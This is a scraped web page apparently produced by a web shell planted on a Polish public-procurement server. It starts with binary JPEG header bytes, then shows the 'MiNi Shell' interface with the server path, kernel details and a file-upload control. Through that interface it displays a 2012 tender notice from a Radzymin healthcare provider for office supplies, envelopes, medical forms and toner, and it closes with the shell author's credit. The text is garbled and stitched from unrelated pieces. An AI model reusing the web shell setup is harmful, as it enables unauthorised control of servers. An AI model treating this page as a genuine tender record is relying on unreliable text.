JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120319/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120319/84776-N-2012.html

<p class="kh_header"><b>Radzymin: Zakup i dostawa artykułów biurowych, kopert i druków medycznych, tuszy i tonerów 2012r.</b><br>
<b>Numer ogłoszenia: 84776 - 2012; data zamieszczenia: 19.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz-radzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów biurowych, kopert i druków medycznych, tuszy i tonerów 2012r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 2 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.92.00-2, 30.19.97.13-1, 22.45.80.00-5, 22.45.80.00-5, 22.60.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie, że wykonawca nie zalega z opłacaniem podatków w Urzędzie Skarbowym.
Oświadczenie, że oferent nie zalega z opłacaniem składek w Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego. 
Oświadczenie o spełnieniu warunków udziału w postępowaniu
Oświadczenie o braku podstaw wykluczenia z postępowania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Radzyminie
Konstytucji 3 Maja 17
05-250 Radzymin
Pokój nr   214  II piętro budynek Przychodni.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2012 godzina 10:30, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Radzyminie
Konstytucji 3 Maja 17
05-250 Radzymin
Pokój nr   214  II piętro budynek Przychodni.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 26.04.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Papier POL lux A4 80g/2mm	8 00 ryz

Papier POL lux A3 80g/2mm	15 ryz
Segregator A4 foliowany  czerwony  75 mm  z szyna met.	70 szt.
 Segregator A4 foliowany czarny  75 mm z szyna met.	70 szt.
Segregator foliowany niebieski z szyną metalową	70 szt.
Segregator A4 foliowany  żółty  75 mm  z szyna met.	70 szt.
 Segregator foliowany niebieski  50 mm z szyna met.	560 szt.
Teczka kartonowa  A4  z gumką 	100 szt.
Długopis BIC Orange czerwony 	60 szt.
Długopis BIC Orange czarny	100 szt.
Długopis BIC Orange niebieski	100 szt.
Długopis Orange zielony 	20 szt.

Długopis Atlantis niebieski	50 szt.

Długopis żelowy	50 szt.

Marker na bazie wody grubość linii 3 mm czarny	70 szt.
Markier lakierowy grubość linii 2 mm czarny	70 szt.
Marker do tablic sucho     scieralne  zestaw 4 kolory	5 szt.
Spinacze biurowe 50 mm	50 op.

Spinacze biurowe 33 mm
	130 op.
Koszulka krystaliczna A4 100 szt. op. 	160 op.
Koszulka krystaliczna szeroka A4   25 szt. op.	20 op.
Pineska beczułka	5 op.

Pineska zwykła metalowa
	10 op.
Ołówek z gumką 2988 / HB 	48 szt.
Brulion w kratkę 96 k.  A4 twarda okładka 	60 szt.
Brulion w kratkę 96  A5 twarda okładka 	60 szt.
Flamaster czarny
	20 szt.
Korektor w długopisie 12 ml.  Tipp-Ex	15  szt.

Korektor w płynie 20 ml. Tipp-Ex	40 szt.

Zszywki 24/6 	10 000 szt.

Zszywki  23/8 	10 op. x 1000

Tusz do stempli uniwersalny  czarny 	30 szt.
Zszywacz FC 5505 Leitz na zszywki 24/6  	10 szt.
 Pamięć przenośna 4 GB	5 szt.

Płyty CD-R  SONY  CAKE 48X  ( op. 50 szt)	10 op.
Skoroszyt wpinany A4 okładka przednia przezro. tylna kolorowa	100 szt.
Teczka kartonowa kolorowa A4  z gumką 	300 szt
Skoroszyt kartono. A4 biały 	600 szt

Grzbiety do bindowania  plastk.  8 mm	1 op
Okładki  A4 przezroczyste do dokumentów służące jako pierwsza strona 	1 op
Okładki skóropodobne A4  służące jako ostatnia strona  	1 op.
Nożyczki  uniwersalne 
  15,5 cm 	5 szt
Woreczki strunowe 175 x 250 mm 	15 op.
Klej w sztyfcie  20G	35 szt
Taśma TESA Transparent - Film  19 mm 	70 szt
Blok A5 bez okładki  w kratkę 	10 szt.

Notes  samoprzylepny  
51x 38 mm     3 szt w op.	30 op.
Notes samoprzylepny do podajnika  Post-it  76x76	20 szt
Podajnik Millenium model  C2014	2 szt.
Baterie alkaiczne ENERGIZER AAA kod BAK  001   1,5 V 	20 op.
Baterie alkaiczne ENERGIZER 4 szt. w op.  1,5 V  	20 op.
Półki na dokumenty przezroczyste	10 szt
Zakreślasz  fluorescencyjny STABLO BOSS  (4 kolor)	25  op.
Flamastry etui (4 kolory)	20 op.

Przekładki kartonowe 	100 szt.

Linijka 30 cm 	10 szt.

Zeszyt A5    32 kart	50 szt.

Zeszyt A5   60 kart	50 szt.

Płyn do czyszczenia tablic suchościeralno- magnetycznych	2  szt.
Klipsy do papieru Grand  19 mm 	20 op
Klipsy do papieru Grand  25 mm	20 op
Przybornik na biurko Dual walec z szufladkami symbol 1995	5 szt
Folia zgrzewarek A4	50 ark. 
Mechanizm skoroszytowy 
	4  op.
Grzbiety wsuwane A4 leitz  (niebieskie)  GBK 127	1 op.
Grzbiety do bindownicy  GBK019 (niebieskie) 	1 op
Temperówka z pojemnikiem 	5 szt
Cienkopis Stabilo Point 88 
Czerwony 40	5  szt.
Cienkopis Stabilo Point 88 
Zielony 36	5 szt.
Cienkopis Stabilo Point 88 
Ciemno niebieski 41	10 szt.
Cienkopis Stabilo Point 88 
Czarny 46	25 szt.
Papier POL lux A4 80g/2mm  mikx kolorów	10 ryz
Dysk DVD +R/R  16x  kod XCK 029   50 szt	1 op.
Gumka Rasoplast	20 szt

 Kredki ołówkowe   24 kolory                                                                                                                                                                             	5 op.

Kredki świecowe
	5 op.
Toner - folia do faksu Panasonic KX-FA57E	5 szt
Blok do flichartów  	2 szt.
Marker permanentny	36 szt.
Marker permanentny wodoodporny	24 szt.
Zeszyt A5/16 kratka
	20 szt.
Zeszyt A5/32 kratka
	20 szt.
Zeszyt A5/16 kratka
	20 szt.
Pamięć przenośna 	 5 szt.
Ołówek wodoodporny	12 szt.
Kostka wkład papieru kolorowy	10 szt.
Zakładki indeksujące Donau 	8 szt
Bloczki samoprzylepne POST IT Tęczowe	8 szt
Karton wizytówkowy	2 op
Papiery kolorowe Rainbow Mix	2op
Długopis FN-07 niebieski	10 op
Długopis FN-07 czarny	4 op
Zszywacz D.Rect 315	10 szt
Zawieszki do kluczy Key Clip	3 op
Teczka tekturowa wiązana 	5 op
Folia laminacyjna samoprzylepna	5 op
Nawilżacz glicerynowy do palców	5 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> koperty pocztowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koperty B4 samoklejące białe
250 x 353 mm	1500 szt.
Koperty C6 samoklejące białe
175 x 125 mm	1000 szt.
Koperty C4 samoklejące białe
229 x 324 mm	1000 szt.
Koperty B5 samoklejące białe
190 x 250 mm	9000 szt.
Koperty pocztowe białe 
126 x 176 mm	15 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> koperty do RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koperty szare do zdjęć RTG 190x250 mm	1000 szt.
Koperty szare do zdjęć RTG  250x311 mm	1000 szt.
Koperty szare do zdjęć RTG 210x410	1000 szt.
Koperty szare do zdjęć RTG 310x410 mm	1500 szt.
Koperty szare do zdjęć RTG  360x360 mm	1500 szt.
Koperty szare do zdjęć RTG 360x410 mm	1500 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.13-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> druków akcydensowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Faktura VAT  A5
	10 bl.

Dowód wpłaty KP	100 bl.

Dowód wpłaty KW	10 bl.

Magazyn wyda	10 bl.

Magazyn przyjmie	10 bl.

Korekta magazynowa  A5	500 szt.

Wniosek o zaliczkę	10 bl.

Nota korygująca VAT nota pełna A5 (kod DRK 049)	2 bl.
Wezwanie do zapłaty A6 DRK  155	5bl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> druki medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Historia choroby klinika chorób wewnętrznych	2 000 szt.
Wkładka do historii choroby	2 000 szt
Wkładka do historii choroby układ krążenia i bad. przedm. 	2000 szt.
Indywidualna karta zleceń lekarskich	2000 szt.
Karta gor. Og. Mz/Szp 16	2000 szt.
Skierowanie do szpitala	4000 szt

Skierowanie do poradni specj.	20 000 szt.
Skierowanie do poradni diagnost.	10000 szt
Karta statysty. Do karty zgonu	1000 szt
Zlecenie na zaopatrzenie wkładki pomocnicze część A	1000 szt.
Skierowanie do zakładu radiologicznego lekar.	5000 szt.
Zapotrzebowanie indywidu. na krew i środki krwiopochodne	3 bl.
Karta serologiczna  bad. w kierunku kiły	600 szt.
Karta badania profilaktycznego	3000 szt
Zestawienie dzienne oddziału	20 bl.

Skierowanie do gabinetu zabiegowego	5000 szt.
Książeczki szczepień	10 bl

Karta informacyjna Izby Przyjęć 	2000 szt.
Skierowanie do laboratorium	10000 szt.

Zlecenie na przewiezienie chorego	1000 szt.
Książka raportów pielęgniarki	50 szt.

Dziennik pracy ambulatorium	70 szt.

Zaświadczenie o pobycie pacjenta w szpitalu	1000 szt.
Skierowanie do sanatorium
	1000 szt.
Skierowanie na próbę zgodności krwi	50 szt.
Badanie bakteriologiczne	100 szt.
Księga pracowni analitycznej
	12 szt.
Książka badania laboratoryjnego	15 szt.
Książka do pracowni RTG	5 szt.
Książka gabinetu zabiegowego	30szt.
księga odwiedziny pielęgniarki środowiskowej	8 szt.
Księga Odwiedziny położnej środowiskowej	5 szt.
Karta opieki nad położnicą
	200 szt
Karta opieki nad noworodkiem
	200 szt

Patronaż   lekarza pediatry	5 bl

Skierowanie na leczenie uzdrowiskowe	3000 szt
Zlecenie transportu sanitarnego 
	3000 szt
Karta ciąży	100 szt.
Karta przebiegu ciąży i połogu
	150 szt.
Wkładka do karty zdrowia	200 szt.

Karta zdrowia dziecka	4000 szt.

Wkładka do karty zdrowia dziecka	5000 szt.
Książka ewidencji noworodków	5 szt.
Bilans zdrowia dziecka 
2 letniego	1000 szt.
Bilans zdrowia dziecka 
4 letniego	1000 szt.
Karta choroby poradni stomatologicznej 	3500 szt.
Recepta na okulary	2000 szt.

Księga chorego na jaskrę	20 bl.

Wynik badania cytologicznego	20 bl.
Wynik badania laboratoryjnego WR	10 bl.
 Lista klasowa	5 bl

Skierowanie do lekarza poz	100 bl.
Karta zdrowia ucznia 2xA5	1000 szt.

Karta rozwoju i zdrowia 
6 latków	15 bl.
Karta Bad. lek. ucznia 
kl. III szk. podstawowej  	10 bl.
Karta Bad. lek. ucznia 
kl. I gimnazjum i kl. I  szk. ponadgimnazjalnej	15 bl.
Karta Bad. lek. ucznia 
ostatniej kl. szk. Ponadgimnazjalnej 18 l.	8 bl
Skierowanie na zabiegi fizjoterapeutyczne	6000 szt
Informacja dotycząca szczepień	1000 szt
Orzeczenie dotyczące kształcenia nauki zawodu	5 bl.
Zaświadczenie lekarskie ucznia szk. ponadpodstaw	5 bl.
Karta zgłoszenia do medycy. pielęgniarki szkolnej	300 szt.
Zaświadczenie lekarskie dla kandydatów do szkół wyższych	5bl.
Odwiedziny pielęgniarki środowiskowej w 3 miesiącu życia	1000 szt.
Odwiedziny pielęgniarki środowiskowej w 9 miesiącu życia	1000 szt.
Wezwanie na szczepienia	10 bl.
Wkładki do karty zdrowia ucznia	1000 szt.
Zaświadczenia o stanie zdrowia	2000 szt.
Zaświadczenia lekarskie med. pracy	3000 szt.
Zaświadczenia lekarskie małe	4000 szt.
Orzeczenia lekarskie
	5000szt
Karta profilaktyczna badania lekarskiego dziecka 7- letniego	3000 szt.
Historia choroby
	20 000 szt.
Wkładki do historii choroby
	40 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.80.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Tusze i tonery oryginały.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Toner do ksero Canon	25
Toner do kserokopiarki	10
Tusz HP C6656A	35
Tusz HP C6657A	35
Tusz HP C87677EE	35
Tusz HP C9352A	25
Tusz HP C9351A	25
Tusz Canon CL-41	15
Tusz Canon PG-40	15
Tusz Canon BX-3	20
Tusz HP C 8766E	20
Toner Oki  B430/B440            na 7000 tyś stron	20
Toner Oki C 565 Y	15
Toner Oki C 5650 C	15
Toner Oki C  5650 K	20
Toner  Oki C 5650 M	15
Toner Oki B 410	15
Toner Oki MB 480	15
Bęben Oki MB 480 	5 
Toner Samsung ML - 1910 PR	5
Toner Bretha HL 2035	25
Bęben Bretha 	4
Toner Oki MB 290	8
Bęben OKI MB 290	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com